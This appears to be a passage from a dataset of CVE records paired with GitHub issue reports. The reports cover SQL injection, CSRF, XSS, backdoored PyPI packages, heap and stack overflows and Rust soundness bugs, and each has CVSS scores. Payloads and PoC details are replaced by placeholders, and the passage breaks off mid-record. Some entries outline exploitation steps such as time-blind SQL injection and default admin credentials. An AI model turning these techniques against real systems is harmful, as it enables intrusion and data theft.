  84543. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/6",
  84544. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/6",
  84545. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84546. "Issue_Created_At": "2022-06-09T09:41:10Z",
  84547. "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84548. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84549. "severity": "HIGH",
  84550. "baseScore": 7.5,
  84551. "impactScore": 3.6,
  84552. "exploitabilityScore": 3.9
  84553. },
  84554. {
  84555. "CVE_ID": "CVE-2022-33094",
  84556. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/4",
  84557. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/4",
  84558. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84559. "Issue_Created_At": "2022-06-09T07:48:06Z",
  84560. "description": "SQL Injection vulnerability . Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG APITAG In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above it is possible to delay the function being executed twice out of NUMBERTAG Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is qscms2 , and the delay as exactly double the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84561. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84562. "severity": "HIGH",
  84563. "baseScore": 7.5,
  84564. "impactScore": 3.6,
  84565. "exploitabilityScore": 3.9
  84566. },
  84567. {
  84568. "CVE_ID": "CVE-2022-33097",
  84569. "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/7",
  84570. "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/7",
  84571. "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
  84572. "Issue_Created_At": "2022-06-09T09:41:16Z",
  84573. "description": "SQL Injection vulnerability. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a FILETAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. POC: Payload\uff1a PATHTAG APITAG / In the path PATHTAG is not strictly filtered for $keyword, resulting in SQL injection exp1: URLTAG FILETAG As you can see from the figure above, the APITAG function is executed, and there is a time blind SQL With the payload test above, it is possible that the APITAG function being executed NUMBERTAG times. Time blinds are possible to guess the length of the database: exp2: URLTAG FILETAG As shown in the following figure, we can know through the arbitrary file read vulnerability that The database name of the website is telojob_se , and the delay as exactly NUMBERTAG times the length of APITAG so the injection is successfull FILETAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
  84574. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  84575. "severity": "HIGH",
  84576. "baseScore": 7.5,
  84577. "impactScore": 3.6,
  84578. "exploitabilityScore": 3.9
  84579. },
  84580. {
  84581. "CVE_ID": "CVE-2022-33114",
  84582. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/38",
  84583. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/38",
  84584. "Repo_new": "jflyfox/jfinal_cms",
  84585. "Issue_Created_At": "2022-06-10T02:49:09Z",
  84586. "description": "SQL injection vulnerability exists in APITAG CMS NUMBERTAG The vulnerability appears in lines NUMBERTAG of the APITAG APITAG APITAG The APITAG parameter is the APITAG parameter passed from the front end So you can construct payload to exploit this vulnerability Exploit Maven Startup Environment Vulnerability address: PATHTAG Administrator login is required. The default account password is admin:admin NUMBERTAG APITAG Injection parameters: APITAG payload\uff1a CODETAG APITAG Sqlmap: APITAG",
  84587. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  84588. "severity": "HIGH",
  84589. "baseScore": 7.2,
  84590. "impactScore": 5.9,
  84591. "exploitabilityScore": 1.2
  84592. },
  84593. {
  84594. "CVE_ID": "CVE-2022-33121",
  84595. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/45",
  84596. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/45",
  84597. "Repo_new": "bg5sbk/minicms",
  84598. "Issue_Created_At": "2022-06-11T12:37:22Z",
  84599. "description": "There are two CSRF vulnerabilities that can lead to deleting local .dat files. Software Link : URLTAG After the installation is complete, log in as administrator, open the page In FILETAG and FILETAG , user can delete any local .dat files without filter FILETAG FILETAG Create NUMBERTAG dat in the parent directory FILETAG To delete NUMBERTAG dat, the url is like URLTAG Or URLTAG Also you can delete any .dat file like local google chrome file FILETAG URLTAG Here is CSRF POC FILETAG : Log in and click the link in APITAG modify the parameter of delete and users will delete the .dat file in the specified directory at last. APITAG",
  84600. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
  84601. "severity": "HIGH",
  84602. "baseScore": 8.1,
  84603. "impactScore": 5.2,
  84604. "exploitabilityScore": 2.8
  84605. },
  84606. {
  84607. "CVE_ID": "CVE-2022-33122",
  84608. "Issue_Url_old": "https://github.com/eyoucms/eyoucms/issues/24",
  84609. "Issue_Url_new": "https://github.com/weng-xianhu/eyoucms/issues/24",
  84610. "Repo_new": "weng-xianhu/eyoucms",
  84611. "Issue_Created_At": "2022-06-12T02:49:11Z",
  84612. "description": "There is stored XSS in version NUMBERTAG which can lead to stealing sensitive information of logged in users. Software Link : URLTAG Website : FILETAG Vulnerable version NUMBERTAG download address \uff1a FILETAG After the installation is complete, log in as admin, open the page FILETAG Here you can fill in malicious APITAG code to cause stored xss FILETAG Malicious code is spliced \u200b\u200binto the href link FILETAG Causes stored XSS to steal sensitive information of logged in users FILETAG POC : APITAG",
  84613. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  84614. "severity": "MEDIUM",
  84615. "baseScore": 4.8,
  84616. "impactScore": 2.7,
  84617. "exploitabilityScore": 1.7
  84618. },
  84619. {
  84620. "CVE_ID": "CVE-2022-33124",
  84621. "Issue_Url_old": "https://github.com/aio-libs/aiohttp/issues/6772",
  84622. "Issue_Url_new": "https://github.com/aio-libs/aiohttp/issues/6772",
  84623. "Repo_new": "aio-libs/aiohttp",
  84624. "Issue_Created_At": "2022-05-31T11:50:45Z",
  84625. "description": "nvalid IP NUMBERTAG URL. Describe the bug URL analysis To Reproduce use oss fuzz this is the crash APITAG APITAG Expected behavior Denial of service Logs/tracebacks ERRORTAG Python Version APITAG aiohttp Version APITAG multidict Version APITAG yarl Version APITAG OS ubuntu Related component Server Additional context _No response_ Code of Conduct [X] I agree to follow the aio libs Code of Conduct",
  84626. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84627. "severity": "MEDIUM",
  84628. "baseScore": 5.5,
  84629. "impactScore": 3.6,
  84630. "exploitabilityScore": 1.8
  84631. },
  84632. {
  84633. "CVE_ID": "CVE-2022-34000",
  84634. "Issue_Url_old": "https://github.com/libjxl/libjxl/issues/1477",
  84635. "Issue_Url_new": "https://github.com/libjxl/libjxl/issues/1477",
  84636. "Repo_new": "libjxl/libjxl",
  84637. "Issue_Created_At": "2022-06-06T08:27:22Z",
  84638. "description": "Assert failure in APITAG desc There is a assert failure in libjxl before version NUMBERTAG that could cause deny of service attack. asan output ERRORTAG poc FILETAG reproduce compile libjxl with address sanitizer run APITAG",
  84639. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  84640. "severity": "MEDIUM",
  84641. "baseScore": 6.5,
  84642. "impactScore": 3.6,
  84643. "exploitabilityScore": 2.8
  84644. },
  84645. {
  84646. "CVE_ID": "CVE-2022-34053",
  84647. "Issue_Url_old": "https://github.com/ylliprifti/dr-web-engine/issues/4",
  84648. "Issue_Url_new": "https://github.com/ylliprifti/dr-web-engine/issues/4",
  84649. "Repo_new": "ylliprifti/dr-web-engine",
  84650. "Issue_Created_At": "2022-06-13T14:09:38Z",
  84651. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install dr web APITAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG",
  84652. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84653. "severity": "CRITICAL",
  84654. "baseScore": 9.8,
  84655. "impactScore": 5.9,
  84656. "exploitabilityScore": 3.9
  84657. },
  84658. {
  84659. "CVE_ID": "CVE-2022-34054",
  84660. "Issue_Url_old": "https://github.com/ludovicmoncla/perdido/issues/1",
  84661. "Issue_Url_new": "https://github.com/ludovicmoncla/perdido/issues/1",
  84662. "Repo_new": "ludovicmoncla/perdido",
  84663. "Issue_Created_At": "2022-06-14T03:20:00Z",
  84664. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install perdido NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84665. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84666. "severity": "CRITICAL",
  84667. "baseScore": 9.8,
  84668. "impactScore": 5.9,
  84669. "exploitabilityScore": 3.9
  84670. },
  84671. {
  84672. "CVE_ID": "CVE-2022-34055",
  84673. "Issue_Url_old": "https://github.com/drewxa/summer-tasks/issues/4",
  84674. "Issue_Url_new": "https://github.com/drewxa/summer-tasks/issues/4",
  84675. "Repo_new": "drewxa/summer-tasks",
  84676. "Issue_Created_At": "2022-06-14T03:45:36Z",
  84677. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install drxhello NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG Your project url: URLTAG",
  84678. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84679. "severity": "CRITICAL",
  84680. "baseScore": 9.8,
  84681. "impactScore": 5.9,
  84682. "exploitabilityScore": 3.9
  84683. },
  84684. {
  84685. "CVE_ID": "CVE-2022-34056",
  84686. "Issue_Url_old": "https://github.com/TimHessels/watertools/issues/1",
  84687. "Issue_Url_new": "https://github.com/timhessels/watertools/issues/1",
  84688. "Repo_new": "timhessels/watertools",
  84689. "Issue_Created_At": "2022-06-14T10:23:53Z",
  84690. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install watertools NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84691. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84692. "severity": "CRITICAL",
  84693. "baseScore": 9.8,
  84694. "impactScore": 5.9,
  84695. "exploitabilityScore": 3.9
  84696. },
  84697. {
  84698. "CVE_ID": "CVE-2022-34059",
  84699. "Issue_Url_old": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
  84700. "Issue_Url_new": "https://github.com/sixfab/setup-and-diagnostic-tool/issues/7",
  84701. "Repo_new": "sixfab/setup-and-diagnostic-tool",
  84702. "Issue_Created_At": "2022-06-14T14:03:52Z",
  84703. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install sixfab tool i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84704. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84705. "severity": "CRITICAL",
  84706. "baseScore": 9.8,
  84707. "impactScore": 5.9,
  84708. "exploitabilityScore": 3.9
  84709. },
  84710. {
  84711. "CVE_ID": "CVE-2022-34060",
  84712. "Issue_Url_old": "https://github.com/togglee/togglee-python/issues/2",
  84713. "Issue_Url_new": "https://github.com/togglee/togglee-python/issues/2",
  84714. "Repo_new": "togglee/togglee-python",
  84715. "Issue_Created_At": "2022-06-14T14:24:03Z",
  84716. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install togglee NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84717. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84718. "severity": "CRITICAL",
  84719. "baseScore": 9.8,
  84720. "impactScore": 5.9,
  84721. "exploitabilityScore": 3.9
  84722. },
  84723. {
  84724. "CVE_ID": "CVE-2022-34061",
  84725. "Issue_Url_old": "https://github.com/CatNeverCodes/catly_translate/issues/1",
  84726. "Issue_Url_new": "https://github.com/tunglies/catly_translate/issues/1",
  84727. "Repo_new": "tunglies/catly_translate",
  84728. "Issue_Created_At": "2022-06-15T03:16:03Z",
  84729. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install catly translate NUMBERTAG i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG",
  84730. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84731. "severity": "CRITICAL",
  84732. "baseScore": 9.8,
  84733. "impactScore": 5.9,
  84734. "exploitabilityScore": 3.9
  84735. },
  84736. {
  84737. "CVE_ID": "CVE-2022-34065",
  84738. "Issue_Url_old": "https://github.com/rondolu/project-yt-concate/issues/1",
  84739. "Issue_Url_new": "https://github.com/rondolu/project-yt-concate/issues/1",
  84740. "Repo_new": "rondolu/project-yt-concate",
  84741. "Issue_Created_At": "2022-06-16T14:49:33Z",
  84742. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install rondolu yt concate i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG in APITAG replace request with requests",
  84743. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84744. "severity": "CRITICAL",
  84745. "baseScore": 9.8,
  84746. "impactScore": 5.9,
  84747. "exploitabilityScore": 3.9
  84748. },
  84749. {
  84750. "CVE_ID": "CVE-2022-34066",
  84751. "Issue_Url_old": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
  84752. "Issue_Url_new": "https://github.com/rasmushaugaard/texercise-cli/issues/1",
  84753. "Repo_new": "rasmushaugaard/texercise-cli",
  84754. "Issue_Created_At": "2022-06-18T00:44:51Z",
  84755. "description": "code execution backdoor. We found a malicious backdoor in versions NUMBERTAG APITAG of this project, and its malicious backdoor is the request package. Even if the request package was removed by pypi, many mirror sites did not completely delete this package, so it could still be APITAG using pip install texercise i URLTAG trusted host APITAG the request malicious plugin can be successfully installed. FILETAG Repair suggestion: delete version NUMBERTAG APITAG in APITAG replace request with requests",
  84756. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84757. "severity": "CRITICAL",
  84758. "baseScore": 9.8,
  84759. "impactScore": 5.9,
  84760. "exploitabilityScore": 3.9
  84761. },
  84762. {
  84763. "CVE_ID": "CVE-2022-34092",
  84764. "Issue_Url_old": "https://github.com/saladesituacao/i3geo/issues/3",
  84765. "Issue_Url_new": "https://github.com/saladesituacao/i3geo/issues/3",
  84766. "Repo_new": "saladesituacao/i3geo",
  84767. "Issue_Created_At": "2022-06-13T19:58:56Z",
  84768. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84769. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84770. "severity": "MEDIUM",
  84771. "baseScore": 6.1,
  84772. "impactScore": 2.7,
  84773. "exploitabilityScore": 2.8
  84774. },
  84775. {
  84776. "CVE_ID": "CVE-2022-34092",
  84777. "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/3",
  84778. "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/3",
  84779. "Repo_new": "edmarmoretti/i3geo",
  84780. "Issue_Created_At": "2022-06-14T10:56:46Z",
  84781. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84782. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84783. "severity": "MEDIUM",
  84784. "baseScore": 6.1,
  84785. "impactScore": 2.7,
  84786. "exploitabilityScore": 2.8
  84787. },
  84788. {
  84789. "CVE_ID": "CVE-2022-34094",
  84790. "Issue_Url_old": "https://github.com/edmarmoretti/i3geo/issues/5",
  84791. "Issue_Url_new": "https://github.com/edmarmoretti/i3geo/issues/5",
  84792. "Repo_new": "edmarmoretti/i3geo",
  84793. "Issue_Created_At": "2022-06-14T10:57:53Z",
  84794. "description": "Vulnerabilidade XSS APITAG Site Scripting) or HTML Injection FILETAG . Boa tarde A vulnerabilidade em quest\u00e3o est\u00e1 no arquivo FILETAG . O n\u00edvel de severidade da vulnerabilidade \u00e9 alta, pois \u00e9 poss\u00edvel a inje\u00e7\u00e3o de c\u00f3digo html, bem como a execu\u00e7\u00e3o de c\u00f3digo javascript. Proof of Concept (POC) O falha pode ser testada da seguinte maneira: URLTAG Desde j\u00e1 agrade\u00e7o a aten\u00e7\u00e3o. Wagner Drachinski FILETAG",
  84795. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  84796. "severity": "MEDIUM",
  84797. "baseScore": 6.1,
  84798. "impactScore": 2.7,
  84799. "exploitabilityScore": 2.8
  84800. },
  84801. {
  84802. "CVE_ID": "CVE-2022-34132",
  84803. "Issue_Url_old": "https://github.com/bbalet/jorani/issues/369",
  84804. "Issue_Url_new": "https://github.com/bbalet/jorani/issues/369",
  84805. "Repo_new": "bbalet/jorani",
  84806. "Issue_Created_At": "2022-06-05T19:17:08Z",
  84807. "description": "Several vulnerabilities. Hello, Several vulnerabilites were found when peeking into Jorani webapp. An email containing details about those issues was sended. Best regards,",
  84808. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84809. "severity": "CRITICAL",
  84810. "baseScore": 9.8,
  84811. "impactScore": 5.9,
  84812. "exploitabilityScore": 3.9
  84813. },
  84814. {
  84815. "CVE_ID": "CVE-2022-34299",
  84816. "Issue_Url_old": "https://github.com/davea42/libdwarf-code/issues/119",
  84817. "Issue_Url_new": "https://github.com/davea42/libdwarf-code/issues/119",
  84818. "Repo_new": "davea42/libdwarf-code",
  84819. "Issue_Created_At": "2022-06-15T12:36:15Z",
  84820. "description": "heap overflow in dwarf_global_formref_b. asan output: ERRORTAG poc: FILETAG repro: APITAG",
  84821. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  84822. "severity": "HIGH",
  84823. "baseScore": 8.1,
  84824. "impactScore": 5.2,
  84825. "exploitabilityScore": 2.8
  84826. },
  84827. {
  84828. "CVE_ID": "CVE-2022-34300",
  84829. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/167",
  84830. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/167",
  84831. "Repo_new": "syoyo/tinyexr",
  84832. "Issue_Created_At": "2022-06-14T16:06:34Z",
  84833. "description": "heap overflow in APITAG desc There is a heap based buffer overflow in APITAG before NUMBERTAG that could cause remote code execution depending on the usage of this program. asan output ERRORTAG poc FILETAG reproduce compile this project using address sanitizer run APITAG",
  84834. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  84835. "severity": "HIGH",
  84836. "baseScore": 8.8,
  84837. "impactScore": 5.9,
  84838. "exploitabilityScore": 2.8
  84839. },
  84840. {
  84841. "CVE_ID": "CVE-2022-34913",
  84842. "Issue_Url_old": "https://github.com/nereusx/md2roff/issues/4",
  84843. "Issue_Url_new": "https://github.com/nereusx/md2roff/issues/4",
  84844. "Repo_new": "nereusx/md2roff",
  84845. "Issue_Created_At": "2022-06-29T15:07:29Z",
  84846. "description": "Stack Based Buffer Overflow When Processing Markdown Files . Hi! I'm a big fan of md2roff. It's been quite useful and has come in handy in so many situations! Stack Based Buffer Overflow I wanted to make you aware of a stack based buffer overflow vulnerability in the md2roff tool. A buffer overflow condition exists when a program attempts to put more data in a buffer than it can hold or when a program attempts to put data in a memory area past a buffer. At a minimum this will lead to a denial of service (if md2roff is run as a server/service) but can also lead to arbitrary code execution URLTAG and privilege escalation as a result of the return pointer (on the stack) being overwritten. Reproduction To reproduce the vulnerability, execute the following commands in Linux once you have compiled the program (using the default Makefile). Create a markdown file with a large number of integers: FILETAG Verify the markdown file contains our large buffer of NUMBERTAG s: FILETAG Execute md2roff using any preferred flags and confirm the segfault: FILETAG Using GDB we can see that we successfully redirected the execution of the program. We can se our NUMBERTAG s on the stack and the program attempting to return to NUMBERTAG which is NUMBERTAG repeated in hex). FILETAG FILETAG Remediation Replace all instances of strcpy with strncpy and ensure the content being read into the buffer is the same size or smaller than the available buffer space: URLTAG URLTAG URLTAG URLTAG Useful References URLTAG CVETAG FILETAG > Check the warning in the description URLTAG > Safer way to copy a buffer",
  84847. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84848. "severity": "CRITICAL",
  84849. "baseScore": 9.8,
  84850. "impactScore": 5.9,
  84851. "exploitabilityScore": 3.9
  84852. },
  84853. {
  84854. "CVE_ID": "CVE-2022-35411",
  84855. "Issue_Url_old": "https://github.com/abersheeran/rpc.py/issues/22",
  84856. "Issue_Url_new": "https://github.com/abersheeran/rpc.py/issues/22",
  84857. "Repo_new": "abersheeran/rpc.py",
  84858. "Issue_Created_At": "2022-07-05T19:41:44Z",
  84859. "description": "Unauthenticated Remote Code Execution vulnerability. Unfortunately, I have not received any replies from the maintainer within a time frame of two weeks, so I am disclosing this vulnerability that is still existent in the latest version, with no patch available: URLTAG",
  84860. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84861. "severity": "CRITICAL",
  84862. "baseScore": 9.8,
  84863. "impactScore": 5.9,
  84864. "exploitabilityScore": 3.9
  84865. },
  84866. {
  84867. "CVE_ID": "CVE-2020-36436",
  84868. "Issue_Url_old": "https://github.com/udoprog/unicycle/issues/8",
  84869. "Issue_Url_new": "https://github.com/udoprog/unicycle/issues/8",
  84870. "Repo_new": "udoprog/unicycle",
  84871. "Issue_Created_At": "2020-11-15T06:02:43Z",
  84872. "description": "APITAG and Unordered<T, S> need bounds on their APITAG traits. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG : URLTAG and ERRORTAG URLTAG types implement the Send and Sync traits for all types. This should likely be bounded by Send / Sync on the contained types otherwise it can lead to data races from safe Rust code. Here's an example of such a data race with APITAG : ERRORTAG which outputs: APITAG",
  84873. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84874. "severity": "HIGH",
  84875. "baseScore": 8.1,
  84876. "impactScore": 5.9,
  84877. "exploitabilityScore": 2.2
  84878. },
  84879. {
  84880. "CVE_ID": "CVE-2021-28032",
  84881. "Issue_Url_old": "https://github.com/bennetthardwick/nano-arena/issues/1",
  84882. "Issue_Url_new": "https://github.com/bennetthardwick/nano-arena/issues/1",
  84883. "Repo_new": "bennetthardwick/nano-arena",
  84884. "Issue_Created_At": "2021-03-01T17:52:00Z",
  84885. "description": "split_at can create unsound aliasing violations if APITAG returns different indexes. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in the APITAG functions: URLTAG APITAG is called twice, the first time to select the value from the arena and then the second time to create the split. Since the Borrow trait is not required to return the same thing twice, this can be used to create two mutable references to the same object: ERRORTAG This outputs: APITAG",
  84886. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84887. "severity": "CRITICAL",
  84888. "baseScore": 9.8,
  84889. "impactScore": 5.9,
  84890. "exploitabilityScore": 3.9
  84891. },
  84892. {
  84893. "CVE_ID": "CVE-2020-36439",
  84894. "Issue_Url_old": "https://github.com/kvark/ticketed_lock/issues/7",
  84895. "Issue_Url_new": "https://github.com/kvark/ticketed_lock/issues/7",
  84896. "Repo_new": "kvark/ticketed_lock",
  84897. "Issue_Created_At": "2020-11-17T05:26:28Z",
  84898. "description": "APITAG and APITAG should only be sendable when T is Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that APITAG URLTAG and APITAG URLTAG implement Send for all types T . However, this should probably be bounded by APITAG , otherwise it allows smuggling non Send types across thread boundaries. Here's an example of a data race with Rc s that segfaults safe Rust code: ERRORTAG This outputs: APITAG",
  84899. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84900. "severity": "HIGH",
  84901. "baseScore": 8.1,
  84902. "impactScore": 5.9,
  84903. "exploitabilityScore": 2.2
  84904. },
  84905. {
  84906. "CVE_ID": "CVE-2021-29937",
  84907. "Issue_Url_old": "https://github.com/Yoric/telemetry.rs/issues/45",
  84908. "Issue_Url_new": "https://github.com/yoric/telemetry.rs/issues/45",
  84909. "Repo_new": "yoric/telemetry.rs",
  84910. "Issue_Created_At": "2021-02-17T20:45:50Z",
  84911. "description": "uninitialized memory can be dropped on panic: APITAG Hello, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG User provided APITAG can potentially panic, and if APITAG panics while vec is only partially initialized, uninitialized memory (uninitialized T ) is dropped and can lead to undefined behavior. Thank you for checking out this issue :)",
  84912. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  84913. "severity": "CRITICAL",
  84914. "baseScore": 9.8,
  84915. "impactScore": 5.9,
  84916. "exploitabilityScore": 3.9
  84917. },
  84918. {
  84919. "CVE_ID": "CVE-2021-25900",
  84920. "Issue_Url_old": "https://github.com/servo/rust-smallvec/issues/252",
  84921. "Issue_Url_new": "https://github.com/servo/rust-smallvec/issues/252",
  84922. "Repo_new": "servo/rust-smallvec",
  84923. "Issue_Created_At": "2021-01-08T05:18:24Z",
